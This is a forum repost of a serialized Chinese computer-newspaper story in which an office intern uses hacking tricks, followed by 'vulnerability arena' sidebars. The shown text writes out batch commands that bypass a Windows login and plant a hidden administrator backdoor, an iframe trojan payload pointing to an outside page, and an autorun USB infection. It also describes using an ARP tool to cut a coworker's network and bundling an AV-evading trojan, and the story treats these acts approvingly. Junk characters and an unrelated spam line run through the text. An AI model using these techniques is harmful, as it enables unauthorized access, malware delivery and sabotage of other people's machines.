在满意了,给上海居住证积分的好处你,得我的好处,该给我帮忙了吧,给我解决问题了吧?被人诬陷,怎么证明自己清白,还要

社区广播台
查看: 7249|回复: 26
毒辣辣求职记全集(电脑报“黑客营”连载)
TA的每日心情开心 08:29签到天数: 355 天[LV.8]以坛为家I
第一节:电脑报第19期 G8版
黑客营毒辣辣求职记(1)和诸多大学毕业生一样,毒辣辣面临着就业的巨大压力,但毒辣辣又与普通大学生有所不同,他在大学课余时间学习了黑客技术。这些黑客技术会对他的求职之路产生哪些影响?运用这些黑客技术,毒辣辣能博得领导和同事的好感吗?能顺利入职成为公司正式的一员吗?通过对本系列的阅读,即使你毫无黑客基础,也可以掌握一些简单的黑客工具和黑客技巧,让你成为办公室内的电脑高手。毒辣辣求职记开演了!连载地址:http://go.shudoo.com/g/hky.htm + A" k' w% f" R$ X
初入职场立一功故事主角:毒辣辣其他人物:胖哥(老资格的同事) 主任(直接领导)本期知识点:绕过系统登录验证 故事提要:在某知名公司实习的毒辣辣,第一天就等到了一个表现机会。主任电脑的系统登录密码离奇出错。如何清除系统登录密码呢?如何不用系统光盘,编程绕过了登录验证呢? 初来乍到我,绰号毒辣辣,因喜好黑客技术、研究病毒得此名。此前,我一直沉迷于研究黑客技术,没有去找工作,可大四毕业的期限越来越近,我不能再等待了,必须爆发自己。我决定先找一家公司实习,力求通过实习期间的表现,增加与公司的双向沟通与了解,充分展现个人价值,最终实现曲线就业的目的。经过反复筛选和积极联系争取,我如愿以偿地进入了某知名公司实习。第一天上班,我穿上新买的黑色西装,打上鲜红的领带,何等意气风发。在公司的会议室,主任接待了我和其他几名实习员工。“欢迎你们!我们是一家正规的知名公司,拥有良好的企业文化和传统。你们虽然是实习生,但也要以正式员工的标准严格要求自己,这对你们的成长和进步十分重要。你们之中优秀者,将会在实习期结束时,优先获得成为正式员工的机会……”主任的话很具有感染力和号召力,让我们几个实习生热血沸腾。身为一名天蝎男,我也难逃内向的命运,在心中琢磨怎么表态时,主任盯着我:“看简历,你计算机技术不错,就到公司的信息中心实习吧!信息中心的胖哥是我们的技术权威,你就先跟他吧,要珍惜机会、虚心学习!” “我一定好好干,干的好好的!”我中断了琢磨,结结巴巴地回答,老实说,言语表达不是我的强项,不知道会不会影响领导对我的印象,我纠结这个。 表现机会胖哥是一个体重超过180斤的老员工——据说才进公司的时候只有120斤,稍有秃顶、脸圆圆的、看上去非常憨厚。这个上午,胖哥就让我刻个资料备份光盘,做了一个网线头,虽然这活技术含量不高,但我认认真真的完成了。& && & 当我以为今天就这么浑浑噩噩地度过时,主任打来了电话:“胖子,我的笔记本电脑系统登录密码出错了( Windows XP),三点钟要开会,你快过来处理一下。”情况紧急,胖哥急匆匆赶往主任的办公室,我想了一下也跟了上去。我到主人的办公室时,只听见主任十分着急地说道:“还没有搞定?半个小时后我开会就要用了!”“找一张系统光盘就可以解决问题。该死,我把系统光盘放哪了,我马上回去找找!”胖哥有急匆匆离开主任的办公室,我鼓起勇气对主任说:“不用系统光盘,也可以解决这个问题”“真的?你来试试!”我的方法是在电脑中新建一个用户,这样不但可以间接清除系统登录密码,还在笔记本电脑中留下了“后门”。迅速做到主任的台式机前,插入随身携带的闪存,然后下载了USBoot(见图),该工具可以把闪存变成一个系统启动盘。我新建了一个文本文件,在里面输入以下代码:Net user hh 123/addNet localgroup administrators hh/addExit代码的意思是创建一个有系统管理员权限的账号,账号名为hh,密码为123。将该文本文件保存为.bat文件,然后利用压缩工具将该文件转化成可自解压的文件(magnify.exe),文件名必须改为magnify。
任务完成时间一分一秒过去,主任十分焦急:“怎么样,能行么?”“马上就好,最多5分钟!”我自信满满地答到,虽然我不擅长语言表达,但有的是技术资本。我麻利地将闪存插入主任的笔记本电脑中,设置开机启动顺序为“USB”优先,系统成功进入DOS界面,在DOS界面中输入cd' M* T( S8 V/ c: r/ W
Windows、cd4 t/ X, m9 H; J* {6 R2 J
system32进入C:\ Windows\ system32,再输入copy E:\ magnify.exe
C:\ Windows\ system32\magnify.exe(E盘就是闪存盘)。拔出闪存,重启系统,按下组合键“Windows+U”,激活自解压文件,创建新的系统登录账号,输入用户名hh和密码123。伴随着那熟悉的开机登录音乐,系统成功登录到桌面了。“干得不错!”主任由衷地夸张我。最后的事情就是删除原账号的密码,这对我来说就是小菜一碟。在清除原登录密码的过程中,我意外地发现笔记本电脑中有一个隐藏的账号,通过日志检查,发现该账号创建已经很长时间了。时间紧迫,我无法深入追究刘主任的登录密码失效是不是有人故意弄的,只好删除了隐藏的账号,却不想这样做无形中得罪了人……
职场新人注意事项注意事项1:穿着要精神。每个公司企业不一样文化,要求也不一样,有的公司要求上班必须西装革履,有的公司对穿着没有要求,所以事先要做好充分调查。无论有没有要求,穿的精神都是必要的,可以给同事和领导留下好印象。本文中毒辣辣穿西装就是一个不错的选择。注意事项2:要抓住一切机会表现自己。新人最需要的就是表现自己,让领导迅速的对自己有一个良好的印象,一旦碰到这样的机会,千万要抓住。本文中的毒辣辣就是抓住了表现机会获得了领导的好感。
注意事项3:态度要积极。新人初期的任务多是干一些杂活,难免要为老员工跑跑腿,不要抱怨,认真完成任务,给同事留下一个办事认真负责的好印象正所谓,态度决定一切。本文中的毒辣辣认真干杂活的态度值得肯定。 技术延伸文章中用闪存绕过系统登录验证的方法并不常见,这样做相当于在别人的电脑中留下了后门,只需要简单的命令就可以远程连接别人的电脑,在里面为所欲为。常见的做法是,使用DOS下清除系统用户密码的工具Password Changer完成密码清除工作。需要注意的是,直接在DOS界面中删除C:\Windows\system32\config下的SAM密码文件,这种方法适用于Windows 2000系统,不适用于Windows XP系统。如果条件允许的话,最好还是使用番茄花园之类的系统光盘中嵌入的清除密码功能,方便快捷。 交流互动
每期故事中的技术,我们都会在电脑报报官方论坛数动连线(http://www.shudoo.com)安全板块中,邀请黑客营的高手进行深入的挖掘,他们是在什么情况下使用这些黑客技术的,使用过程中可能会出现什么问题,应该如何解决,精彩不容错过!上期的答案是不需要验证。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜,产生了一批幸运获奖者,获奖名单请登录http://go.shudoo.com/g/hky.htm查询。技术题目:为什么文件名必须是magnify?剧情题目:删除隐藏账号会给黑黑产生什么影响( 附上分析)?想知道答案,请看黑黑求职记(2)。如果你想到答案了,请到http://go.shudoo.com/g/hky.htm留言或者发邮件到pcw-chendx@vip.sina.com,答对者将有机会获得我们送出的2GB防病毒闪存。
黑暗竞技场& && & 传说,在云之彼端有一座黑暗竞技场,在竞技场里面可以随意施展黑客技术。每逢虎年,竞技场将打开大门,迎接新的勇士。来吧,来竞技场吧,来一展你的身手吧!在这里,你可以施展黑客技术;在这里,你可以与高手交流。Let’s go! Chrome挂马漏洞研究漏洞的危害本周,我们来研究一下Chrome浏览器挂马漏洞。利用该漏洞可以进行挂马,可以盗取用户的网游、邮箱、QQ、网银等账号和密码。除了挂马外,该漏洞还可以用来安装恶意插件赚取广告费,强迫用户访问黑客指定的网站赚取流量,甚至可以用来恶作剧。 漏洞的原理Chrome浏览器为什么会出这个漏洞呢?经过电脑报安全团队的研究,发现漏洞产生的原因是Chrome浏览器的Webkit内核阅读器对视频模块检测过滤不严导致的。那该漏洞只有Chrome浏览器才有吗?通过实验,我们发现Opear浏览器也存在此漏洞。 漏洞的利用我们提供一个简单的利用思路,先进入QQ空间,然后一篇发表日志(图1),http://www.07s1.cz.cc/1.htm网站是特制的页面。页面中有一段这样的代码:&html&&script&alert(/virus loading...../)&/script&&/html&效果就是弹一个弹窗,内容为virus loading.....(图2)。内容可以修改,例如写一个死循环代码,或者嵌入式挂马代码:&iframe src=&http://www.07s1.cz.cc/1.htm& width=&200& height=&500&&。火狐浏览器同样采用Webkit内核,它会不会也有此漏洞呢?这个悬念就留给大家了!大家可以将自己的研究心得发送到电脑报官方论坛数动连线(http://bbs.shudoo.com)安全板块,也可以直接写信与小编交流,来信请发到pcw-chendx@vip.sina.com。每周我们都会挑出幸运者,赠送每人一份奖品。此外,还有机会在报纸上得到推荐。& && & 本期奖品& && & 本期奖品是安天木马防线KEY和USB连接器,奖品由安天提供,价值30元或300X币。
毒辣辣求职记& && & 看腼腆的实习员工毒辣辣,如何用一些黑客小花招在办公室里面混得风生水起,泡妞、求职两不误!
提高发帖质量,建设交流社区
TA的每日心情开心 08:29签到天数: 355 天[LV.8]以坛为家I
毒辣辣求职记(2)) M+ B; [% I6 o+ U# d/ I1 q) R: j
和诸多大学毕业生一样,毒辣辣面临着就业的巨大压力,但毒辣辣又与普通大学生有所不同,他在大学课余时间学习了黑客技术。这些黑客技术会对他的求职之路产生哪些影响?运用这些黑客技术,毒辣辣能博得领导和同事的好感吗?能顺利入职成为公司正式的一员吗?通过对本系列的阅读,即使你毫无黑客基础,也可以掌握一些简单的黑客工具和黑客技巧,让你成为办公室里的电脑高手。毒辣辣求职记开演了!2 Z! b1 X% V7 Q2 s8 B! U
连载地址:
; {! H6 E) m) p. T! e1 g
来自身边的冷箭
故事主角:毒辣辣: l' b, W6 o8 b
其他人物:胖哥(老资格的同事) 主任(直接领导)紫衣MM(会计)) u1 U2 n* E) L
本期知识点:感染闪存的代码
6 e* r+ M+ V4 E* T0 u1 v' U# Q
故事提要:毒辣辣在成功帮助主任解决登录问题后,大受主任的赏识,主任又交给他一项秘密任务,在执行密码任务的过程中毒辣辣会碰到什么困难?他的任务会圆满完成吗?谁又会在他背后放冷箭呢?
9 i6 U9 |/ f7 s: r) S
主任的秘密任务) @; R* q% A6 m7 P
“粉蓝色的领带好像不适合!”毒辣辣照着镜子,整理着西装,犹豫是不是该换一条素一点的领带。他之所以注重外表,并不是去相亲,而是今天10点钟他将去一趟主任办公室——昨天主任嘱咐的。
10点钟,毒辣辣敲门进入主任办公室,摘下眼镜的主任揉着太阳穴正等着他的到来,主任无视毒辣辣精心打扮的衣着,开门见山地下了命令:“我的笔记本电脑系统登录密码出错,感觉非常诡异。我怀疑有人动过我的电脑,电脑技术方面,我不太懂,你来帮我暗中调查一下。”
“说到别的,我还不敢保证,但说到电脑技术,我绝对没有问题!”
“好,这个事情就交给你去办,不要拖,早点给我完成!”
“是,我尽快完成任务!”
“对了,我听说有一种方法可以让别人不能动我的电脑,只有我自己可以动,你顺便也帮我弄弄!”3 w& H, y. m- W# p+ x
“方法是多,例如离开电脑时按组合键‘Windows+L’,不过最保险的方法是用制作一个针对笔记本电脑的闪存加密钥匙,只有插上闪存输入才可以使用电脑,你随身携带闪存这样别人就无法使用你的电脑了!”毒辣辣面对技术问题,分析的头头是道,而主任却听得似懂非懂。
“就找你说的办吧,这是我的闪存和笔记本电脑。”主任对毒辣辣的回答很满意,当然也不忘给毒辣辣口头表扬和鼓励,“你技术不错,好好干,小伙子。另外,我让你调查的事情要注意保密,不要让别人知道。”
毒辣辣退出主任的办公室,惊喜之前洋溢在脸上:“主任是多么的信任我,看来我留下了的希望很大了!”) M, E6 s. U5 ~! ^' b
送报表的尴尬
回到自己的座位,胖哥就凑了过来:“毒辣辣,不错啊,这么快就得到主任的栽培,我看好你,前途无量!”毒辣辣不免有点春风得意而又得意忘形:“天生我才必有用,像我这样的金子总是要发光的。”
毒辣辣将闪存插入主任的笔记本电脑,下载工具制作闪存加密钥匙。突然,电话铃声响起,毒辣辣不得不停下手中的工作,接听了电话。“舟舟,你们这个月的报表怎么还没有交上来,马上送过来”一个甜美的女声命令道。
还没有等毒辣辣反应过来,电话就挂了,电话没有来电显示,毒辣辣犯难了:“胖哥,刚才有个女的打电话要舟舟交什么报表,是不是打错了?”胖哥眼珠子转了转,点头道:“你现在的位置以前是舟舟在做,这份报表你交给18楼财务总监。”
“我?”毒辣辣看到胖哥的身材只好认命,拔出闪存去送报表,当他来到18楼才想起忘记问胖哥财务总监在哪间办公室,这层楼有好几间都是财务室,毒辣辣不好意思再去问胖哥,只得一间一间找,碰了一鼻子灰。
“你哪来的?有什么事情找总监吗?”一个紫衣MM问毒辣辣,她就是电话里面的那个女人,毒辣辣连忙说明来意。“这种事情,交给我们就行了,能麻烦总监吗?”紫衣MM翻了翻报表,“报表上周就做好了,为什么现在才交上来?”毒辣辣一无所知,只好尴尬的笑了笑。&&B1 }" v1 S+ h5 x) O* A
谁在暗算7 c. ?; f3 E/ b+ }
由于走的匆忙,毒辣辣仅带走了闪存,而没有按组合键“Windows+L”锁住笔记本电脑的系统,一个身影趁毒辣辣去送报表的空暇坐到了主任笔记本电脑前,他输入两段代码,open=激活色情小说.bat,copy d:\色情小说\*.*&&h:\(h是闪存盘),代码的作用是当闪存插入时,自动拷贝色情小说到闪存中,然后他又输了了一段代码,拷贝色情小说后自动删除该文件。
当毒辣辣送完报表回来后,一肚子委屈,也不好怨谁,只得继续闪存加密钥匙的制作。十分钟后,毒辣辣伸了伸懒腰,长出一口气,终于搞定闪存加密钥匙了。他正准备拔出闪存,突然看到闪存中一个文本文件,记忆中没有这个文件。
毒辣辣打开文件,冷汗直冒,如果自己没有最后的检测,将闪存交给主任,后果不堪设想,为什么闪存中会莫名其妙的多出色情小说?毒辣辣陷于沉思……* M) L7 O9 c3 z8 U) \! R6 e
, }$ Z' y4 E: ~3 N! Q
1.新人要低调# c3 s7 Z, ~# X# S$ z1 G+ o
作为一名新人,初入职场一定要低调、谦虚,特别是要小心处置好上司、同事等方方面面的关系,时刻保持稳重,不可得意忘形,更不可仗势欺人。每个单位都有自己的文化传统和工作氛围,人际关系也有很多历史渊源,不了解情况下,不要乱表态,尽量不卷入利益纷争之中。上文中的毒辣辣就是得意忘形,才会被人耍。
) [1 S( [5 E0 G7 b/ [1 S
2.做事要细心
毒辣辣接听电话时,没有及时询问对方的身份,送报表前没有询问具体是哪间办公室,交给谁,如果他细心一点,就不会有文中那些尴尬的事情发生了。新人初入职场,要“多看、勤问”把每一个细节做扎实、做到位。) \* C. U# s, F7 `. a( v
技术延伸4 g% ]' c& C( @7 S+ p
感染闪存的方法有很多,本文用的方法是创建一个Autorun文件和批处理文件,当用户进入盘符的时候激活Autorun文件,Autorun文件中又激活批处理文件,批处理文件将批处理将色情小说从硬盘拷到闪存中。这个模式也是闪存病毒常用的,所不同的这里由拷贝病毒变成了拷贝小说。) y" h. U! _&&O* x8 v0 e! V7 Q
此外,闪存加密钥匙就是把闪存制成使用电脑的唯一钥匙,使用电脑时,用户把闪存插入电脑就解锁了;不用电脑时,用户将闪存一拨,电脑就锁定了。制作闪存加密钥匙的工具有很多,例如DiskLogon、Proteg Logon等,软件的具体使用方法请登录电脑报官方论坛数动连线安全板块中查看。
7 I" f1 m1 r4 t- L$ A* j
交流互动! H! {- J. h, M# _
& & & & 每期故事中的技术,我们都会在电脑报官方论坛数动连线()安全板块中,邀请黑客营的高手进行深入的挖掘,他们是在什么情况下使用这些黑客技术的,使用过程中可能会出现什么问题,应该如何解决,精彩不容错过!. v7 _3 q. y1 L5 g
上期技术题目的答案是magnify是放大镜程序。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜,产生了一批幸运获奖者,获奖名单请登录查询。
技术题目:“Windows+L”锁住系统有PJ方法吗?6 _. b5 [" N4 V8 g# m( L0 D9 S
剧情题目:毒辣辣知道是谁在暗算自己吗( 附上分析)?* s9 S7 o! [; n4 t' a
想知道答案,请看毒辣辣求职记(3)。如果你想到答案了,请到留言或者发邮件到,答对者将有机会获得我们送出的2GB防病毒闪存。1 Q& S0 r2 b* D; X7 G&&N/ r
黑客营交流QQ群:,验证码:陈邓新,欢迎大家加入!&&]&&D. {( |1 X
黑白配& D9 D/ g9 C& i! s9 d4 n" _
& & & & 黑白配,男生女生配,在他们的电脑安全生活中,在攻与防中,爆笑无处不在。欢迎投稿或者提供创意,有丰厚的奖励等着你,来稿请寄。* n, k% B2 K6 b
&&R$ g0 _5 E2 |" m. ~3 q
黑暗竞技场
& & & & 传说,在云之彼端有一座黑暗竞技场,在竞技场里面可以随意施展黑客技术。每逢虎年,竞技场将打开大门,迎接新的勇士。来吧,来竞技场吧,来一展你的身手吧!在这里,你可以施展黑客技术;在这里,你可以与高手交流。Let’s go!
不久前,大名鼎鼎的动网论坛PHP版本爆出了一个可以被黑客利用跨站漏洞,该跨站漏洞允许黑客窜改正常动网论坛的URL链接。黑客制作一个“中奖信息”之类的钓鱼网页,或者挂马网页,再通过利用这个漏洞嵌入到有漏洞的动网论坛中,就可以欺骗访问该论坛的用户或者让访问该论坛的网友中病毒。! _&&c. K% P9 C8 q5 D
根据电脑报安全团队分析,出现漏洞的原因是因为动网程序对用户提交的变量代码未进行有效的过滤或转换,允许攻击者插入恶意WEB代码。目前已经发现了三处可以利用漏洞的地方。0 ^$ G0 z* Q. M( Q1 I. b, ?0 }8 d
漏洞的具体利用过程就就留给大家了!大家可以将自己的研究心得发送到电脑报官方论坛数动连线()安全板块,也可以直接写信与小编交流,来信请发到。每周我们都会挑出幸运者,赠送每人一份奖品。此外,还有机会在报纸上得到推荐。) a" L5 v7 F3 [8 `
& & & & 本期奖品是安天木马防线KEY和USB连接器,奖品由安天提供,价值30元或300X币。
提高发帖质量,建设交流社区
TA的每日心情开心 08:29签到天数: 355 天[LV.8]以坛为家I
[温馨提示]:新注册的朋友,建议通过、、转发技术帖子 赚得论坛第一桶金。
同时推荐学习熟悉论坛规则!
黑客营' p' ~! i+ m" n$ Y' P" S, v
毒辣辣求职记(3)% a* _! w: K$ S: y0 d9 J( D9 s
毒辣辣初入职场,就帮助主任解决了一个难题而受到表扬,由于他的得意忘形的,导致有人暗算他,想他在主人面前出丑,幸好毒辣辣及时发现色情小说,但是,暗算者会罢手吗?
毒辣辣求职记第三集开演了!$ ~: I; ?" z" G6 E
连载地址:
; r2 U1 M& _) e
顾此失彼的教训 1 H1 o0 L&&F: K+ r- ^& V4 Q, b
故事主角:毒辣辣2 z/ G& g3 L' A% x
其他人物:胖哥(老资格的同事)、主任(直接领导)、紫衣MM(会计)
本期知识点:用黑客工具限制占用宽带9 v# `9 I3 r8 ]9 x& E/ x
故事提要:毒辣辣受到主任的器重,秘密调查隐藏账号背后的黑手,然而涉世未深的毒辣辣却不知道自己已经树下了强敌,在调查过程中,等待毒辣辣的会是什么呢?他的调查过程会一帆风顺吗?; U6 N, R/ P&&Q& x5 g. x! e
$ C5 e2 E3 b8 I& w$ N3 E
追查隐藏账号$ D4 G) D. @: h" B# _
躺在柔软的床上,毒辣辣脑海中又浮现出闪存中出现色情小说一幕,很明显色情小说冲着自己来的,如果色情小说被主任发现,一定会影响自己的前途。到底是谁想整自己?怎么高超的手法一般人可以不会,毒辣辣有一种说不出的滋味——肯定是信息中心内部的人干的。
信息中心除了胖哥,还有两位同事。毒辣辣摇了摇头,阻止自己继续往下想,不能随意猜测同事!昏昏沉沉睡到半夜,毒辣辣突然睁开眼睛,怕了一下额头:“隐藏账号的主人会不会跟暗算自己的是同一个人?公司哪来那么多高手,绝对是同一人!”) H- A( k8 N% U2 E5 `7 f# U" j! S
放下包袱的毒辣辣,终于进入梦乡。第二天早上,毒辣辣进入办公室就迫不及待地查看记录——在发现隐藏账号后他下意识地保存了安全日志和防火墙记录,安全日志可以查看入侵电脑的用户名(图1),防火墙记录可以查看入侵电脑的IP地址。
安全日志中入侵者的用户名是administrator,看不出是谁的,但是在防火墙记录中找到了入侵者的IP地址。一步大公司对IP地址的管理都较为严格,每个人都对应着唯一的IP地址。
“这下好了,查一下记录就知道谁在用这个IP地址,就知道幕后黑手是谁了!哈哈!”毒辣辣心中既兴奋又担忧。# @4 {* y6 V9 W( Y) H
“胖哥,公司电脑的IP地址是由我们分配和管理吧,有没有记录资料?我想看一看,熟悉一下情况,便于以后工作……”! z! z7 \. d$ k& ~1 t" j! x* ~2 j
“哦!嗯!IP地址确实是我们管理,这记录资料……嗯,让我想想放哪里了。”胖哥显然对毒辣辣提出这个要求感到比较意外,说话有点吞吞吐吐,“我找找吧,找到了我传给你……对了,刚才收发室打电话,说快递公司给我送了个包裹,你去帮我取一下……”
此时,信息中心的电话响了……
紫衣MM的请求$ h. p% _6 T4 j5 Q&&E' {
“信息中心么……我记得你,你是毒辣辣,你来上一下,我有事情要你帮忙!”
毒辣辣反应过来,电话中请求帮助的是财务室的紫衣MM,不过电话中的口气令他非常不舒服,总感觉盛气凌人,到底去还是不去?毒辣辣犹豫一阵,还是决定上去瞧瞧——万一耽搁了公事就不妙了。
在电梯中,毒辣辣接到胖哥的电话。
“毒辣辣,你在哪里?”
“财务室出了点问题,叫我去一下。”
“这样,你快去快回,我们在大会议室等你。”&&x7 U/ [, Z$ [7 ^: T8 C
一下子这么多事,让初入职场的毒辣辣犯晕,现在怎么办?他想了想,还是按照原定计划来到财务室,紫衣MM在座位上玩着镜子正等着他。
“等你好久了!这段时间有人下载《三国》电视剧,网速好慢,害我的菜都被别人偷没了,你有应对的方法没有?”紫衣MM压低声音,悄悄地问毒辣辣。" \5 J/ S' K$ ^" I) P6 f: U
上班时间不能玩游戏,偷菜也是禁止的,这个规矩胖哥告诫过自己,可眼前的紫衣MM却如此的大胆,无视公司的规定,还要自己帮助他偷菜,这让毒辣辣有点不知所措,帮还是不帮?
“喂,别发愣,到底有没有方法?”+ W; j9 |&&D$ Q! s, |7 k
“方法是有的,不过……”$ u1 D( q6 `( o& p$ X1 t* u! v5 O
“不过什么?快说!”1 C+ ]) e5 ]' d. Q# P&&j
“是这样的,我可以教你用一款黑客工具P2P终结者,想限制谁上网速度就限制谁,P2P终结者是ARP工具,使用的时候会对局域网的网速造成一定的影响,因为……”' [) E+ s2 D( ~+ L5 T
“停!停!别解释了,我听不懂,我让你坐,你直接教我用吧!”
毒辣辣做到了紫衣MM电脑前,下载了P2P终结者(),在软件界面中可以看到局域网内所有电脑的信息(图2),这些电脑用没有用ARP防火墙、下载速度是多少。4 g8 @&&q6 ~) r# j* b% z
. a) n8 |7 p* f" G
点击“启动控制”就可以收集局域网内所有电脑的信息了,毒辣辣在反馈信息中找到了疯狂下载的电脑,然后点击右键,选择“断开选中主机公网”,正在下载电视剧的电脑就不能上网了。# Q. o. B, `2 b7 Q
毒辣辣还是比较慎重,不敢让那台电脑一直断网,只是进行了限速设定,最高下载速度不能超过30KB/S。在毒辣辣手把手的教导下,紫衣MM很快就掌握了该工具的使用方法,偷菜那是爽歪歪。2 j. s& l' W) l# ?% b3 A
“这软件蛮好玩的,我收下来啦!看不出来,你还有几分本事!”8 E; i5 X! I! f4 z. b& |8 e
“你上班偷菜,不怕被逮着?”) d+ C' R+ E+ P" n3 }
“这是我们俩的秘密,不要对别人说!”
“要我保密,你要请我吃饭,不然……”) q: [' x0 g- b4 e9 p. _
“好啦好啦!来块巧克力……”- _$ a( b" i% v- \
带毒的记录$ \& r7 Q3 ~3 ?, X8 C( H&&l, p
心情不错的毒辣辣向大会议室走去,在门后碰到主任和胖哥,主任皱着眉头问道:“大家都在忙着准备视频会议,你去哪里了?”此时胖哥接话了:“我让你去取包裹了,怎么人就不见了?包裹还是我取回来的,要不然就影响了这次视频会议。对了,我想起来了,你是不是去了财务室?”
主任没有理会毒辣辣,径直回办公室了。胖哥叹了一口气,拍拍毒辣辣肩膀:“我不是叫你快去快回吗?怎么这么久?算了,下次动作快一点就是。还有,你要的记录我找到了,我传给你”- e' w6 v% D0 P% L' o
晕头转向的毒辣辣机械地跟着胖哥回到办公室,呆呆地收下了记录,运行记录简单扫了几眼,发现发现入侵主任笔记本电脑的IP地址是无人使用的空闲地址。如果毒辣辣此时头脑还是清醒的话,他一定可以发现记录不对劲,捆绑在其中的木马逃不过他的眼睛,可惜现在他的脑子乱得很……0 k% v3 O4 N8 l7 O0 H
职场点评& U0 H. ]' n7 w3 z& L% e5 R- \
本期毒辣辣碰到一个工作中的第一个难题,如何统筹处理多个工作任务,追查隐藏账号、去财务室帮助紫衣MM、帮胖哥取包裹这3个任务有轻有重,有的有时间限制,有的没有,所以要有一个安排,才不会出错。面临多项工作时的应急反映能力、综合协调能力、统筹推进能力是职场新人需要重点锻炼和提高的。) G+ P; v* M6 a" Q9 s0 C
在先后次序上,可以把不同任务划分为重要而紧急,重要而不紧急,紧急而不重要,不紧急且不重要四个层次,依次实施,即使出现疏漏和延误,也不会造成大的后果。例如,毒辣辣应该先确认取包裹这个任务的重要性,如果包裹很重要(跟视频会议有关),就要赶快去,如果包裹不重要,晚一点也没有关系。在方式方法上,要善于运用统筹学优化工作步骤,提高工作效率。在工作习惯上,要养成随手记录工作日志的习惯,形成细致、认真和严谨的工作习惯,确保万无一失。
延伸阅读1 }5 h( G- k' y! `
毒辣辣其实不知道,记录原本是没有捆绑木马的,当胖哥听到毒辣辣的要求后,才决定在记录中动手脚的。胖哥准备好了木马,通过花蝴蝶工具对木马进行了免杀处理,这样木马就可以逃过杀毒软件的查杀。/ o9 A- v( Y- l& [3 _
此后,胖哥调用了木马捆绑器(见图),将记录和木马捆绑在一起,变成一个新的文件,粗看该文件是记录文档,其实里面隐藏了木马。毒辣辣运行记录时,木马就被释放出来,从而导致毒辣辣的电脑被胖哥间接控制了。
; f9 p" s% q1 X. O$ m& a8 }
7 Z7 a6 E$ e3 I: M9 ?* ?& _
交流互动/ s- H* G* e/ L% r6 H; K% W
& & & & 每期故事中的技术,我们都会在电脑报报官方论坛数动连线()安全板块中,邀请黑客营的高手进行深入的挖掘,他们是在什么情况下使用这些黑客技术的,使用过程中可能会出现什么问题,应该如何解决,精彩不容错过!6 k: K2 z5 p5 ^$ ~& ^/ ]$ E
上期的答案是不需要验证。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜,产生了一批幸运获奖者,获奖名单请登录查询。' ^+ r6 h1 ^" v4 ?; ?. g
技术题目:P2P终结者的工作原因是什么?
剧情题目:记录中的IP地址为什么是空闲地址(附上分析)?) x) g! y&&F0 n$ l- K1 q! Z( S9 |
想知道答案,请看黑黑求职记(4)。如果你想到答案了,请到留言或者发邮件到,答对者将有机会获得我们送出的2GB防病毒闪存。黑客营交流群:,验证码:陈邓新,欢迎加入。) c( h/ F( d- f0 e9 R- r
# f9 h( {- ]) {
& & & & 黑白配,男生女生配,在他们的电脑安全生活中,在攻与防中,爆笑无处不在。欢迎投稿或者提供创意,有丰厚的奖励等着你,来稿请寄。
小白的世博梦4 c$ G+ C0 n- b- [7 Z2 D- T$ B
4 w3 V3 s. s+ T8 {7 w5 o
( t7 J6 {% N. Y- S' Q% F3 T! c' Z&&K
黑暗竞技场. K' q! Q. v9 W7 q& u3 S' _5 ^
& & & & 传说,在云之彼端有一座黑暗竞技场,在竞技场里面可以随意施展黑客技术。每逢虎年,竞技场将打开大门,迎接新的勇士。来吧,来竞技场吧,来一展你的身手吧!在这里,你可以施展黑客技术;在这里,你可以与高手交流。Let’s go!
3 U# U& ^8 G7 c) _& w$ C) y& s
最近,国内较早做.net技术的BBSMAX 论坛爆出登录任意账号漏洞。该漏洞可以让黑客通过构造active 字符串的方式登录论坛任意的账号,黑客登录论坛后可以发表虚假信息、诈骗信息,甚至是发表病毒的链接,可以说漏洞的性质非常严重。导致漏洞出现的关键代码如下:
byte[] buffer3;
& & byte[] bytes = Encoding.ASCII.GetBytes(&!bbsmax!&);
& & byte[] rgbIV = Encoding.ASCII.GetBytes(&!zzbird!&);&&W7 k2 P$ U&&A. y( A* C$ A3 _+ p. K
& & try2 H* w# F7 R% j9 j0 a2 ?&&C/ {
& & {$ L! w+ U8 j! z3 O/ G
& && &&&buffer3 = Convert.FromBase64String(data);
完整的代码和漏洞的具体利用方法,请登录论坛查看!大家可以将自己的研究心得发送到电脑报官方论坛数动连线()安全板块,也可以直接写信与小编交流,来信请发到。每周我们都会挑出幸运者,赠送每人一份奖品。此外,还有机会在报纸上得到推荐。
& & & & 本期奖品是安天木马防线KEY和USB连接器,奖品由安天提供,价值30元或300X币。
提高发帖质量,建设交流社区
TA的每日心情开心 08:29签到天数: 355 天[LV.8]以坛为家I
毒辣辣求职记(4)4 k7 ~- s$ Y! ^2 }. \( c/ b2 `&&K
毒辣辣初入职场,就得到主任的赏识,接受了主任秘密任务,调查幕后的神秘黑手,调查过程并不顺利,似乎有一只看不见的手在牵制他。毒辣辣与胖哥之间会发生什么?毒辣辣求职记第四集开演了!
连载地址:&&j. z3 D; `: i
9 ]2 @8 i+ B" G% p9 _7 s. Z/ A
&&助红颜身陷困境
故事主角:毒辣辣
其他人物:胖哥(老资格的同事)、主任(直接领导)、紫衣MM(会计)、老会计
本期知识点:用黑客工具限制某人占用宽带( l7 Z. I! W3 K&&C. h8 b0 P* D$ W$ t
故事提要:毒辣辣利用P2P终结者限制了下载流量,讨得美女欢心,却也无意中得罪了下载电视剧的老会计。毒辣辣只能利用自己的黑客技术私下化解危机,但是他的电脑被植入木马,一举一动都被胖哥尽收眼底……
! I( C2 `2 [( N9 _0 Y* w- w) n9 }
兴师问罪) O" p0 {: {& ?+ M& O
“IP地址竟然是空闲!看来入侵主任笔记本电脑的人,相当的谨慎,没有留下一丝的痕迹。不过记录资料里面的数据真的是原始数据吗?”毒辣辣琢磨着,“最近一段时间,胖哥似乎总是有意无意的出我洋相、让我难堪,其中必有原因。幕后黑手会不会跟他有关系?我们公司哪来那么多高手?一定是他!或许他的电脑里面就有我想要的答案……”% V, h+ m% n, N' E; z! T6 z
“毒辣辣,财务室的老会计反映网速最近突然变得很慢,你去看看吧!”胖哥打断了毒辣辣的思索,给他分配了一个任务。
“好,我马上就去!”毒辣辣正准备偷偷扫描胖哥的电脑,不得不终止行动,先去完成工作任务。
看到毒辣辣离去,胖哥面露惋惜:“这么好的戏,却不能跟着去看,哎!”/ a+ \: j. \/ j8 c" ^6 v% g: m9 E. _
毒辣辣来到财务室,第一眼就看到了紫衣MM,紫衣MM漂亮的眼睛一眨一眨,似乎在传递某种信号,毒辣辣不太明白其中的含义:“先办正事,再去找她。”
